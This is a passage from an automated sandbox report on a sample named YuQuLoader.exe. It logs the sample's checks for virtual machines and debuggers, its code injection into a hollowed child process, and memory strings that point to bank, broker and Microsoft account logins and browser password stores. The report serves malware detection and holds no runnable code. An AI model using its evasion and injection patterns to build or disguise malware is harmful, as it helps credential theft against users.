                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8608
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5fb9e87b-3f8a-4f3e-817e-adfc1cc5517dJump to behavior
                Source: YuQuLoader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\YuQuLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: YuQuLoader.exe, 00000002.00000003.1452699167.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1453921226.000000000167D000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1481847200.0000000003CDA000.00000004.00000800.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1482246336.0000000003CBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: YuQuLoader.exeVirustotal: Detection: 41%
                Source: YuQuLoader.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile read: C:\Users\user\Desktop\YuQuLoader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: YuQuLoader.exeStatic file information: File size 1362432 > 1048576
                Source: YuQuLoader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFDAAA push ecx; ret 0_2_00AFDABD
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0045446E push cs; ret 2_2_004544B8
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044F4CF push esp; retf 2_2_0044F4D2
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00454666 push 9DE8EE2Fh; iretd 2_2_0045468D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_0044F7BD push ds; retf 2_2_0044F83A
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFDAAA push ecx; ret 2_2_00AFDABD
                Source: YuQuLoader.exeStatic PE information: section name: .text entropy: 7.096196420710893
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\YuQuLoader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\YuQuLoader.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeWindow / User API: threadDelayed 5724Jump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exe TID: 8708Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exe TID: 8160Thread sleep count: 5724 > 30Jump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\YuQuLoader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\YuQuLoader.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B0F86F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B0F86F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B0F7BE FindFirstFileExW,0_2_00B0F7BE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B0F86F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B0F86F
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B0F7BE FindFirstFileExW,2_2_00B0F7BE
                Source: Amcache.hve.5.drBinary or memory string: VMware
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D0D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1681524125.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2282475400.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618247234.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: YuQuLoader.exe, 00000002.00000003.1681524125.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2282475400.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618247234.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAMX
                Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
                Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: C:\Users\user\Desktop\YuQuLoader.exeAPI call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00449980 LdrInitializeThunk,2_2_00449980
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B058AE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B058AE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B261B4 mov edi, dword ptr fs:[00000030h]0_2_00B261B4
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B0B1FC GetProcessHeap,0_2_00B0B1FC
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B058AE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B058AE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFD3C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AFD3C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFD77C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AFD77C
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00AFD770 SetUnhandledExceptionFilter,0_2_00AFD770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00B058AE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B058AE
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFD3C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00AFD3C0
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AFD77C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AFD77C

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 0_2_00B261B4 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_00B261B4
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\YuQuLoader.exeMemory written: C:\Users\user\Desktop\YuQuLoader.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,0_2_00B0F0C6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,0_2_00B0F067
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,0_2_00B0F19B
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,0_2_00B0F1E6
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00B0F28D
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: EnumSystemLocalesW,0_2_00B0AAE7
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: GetLocaleInfoW,0_2_00B0F393
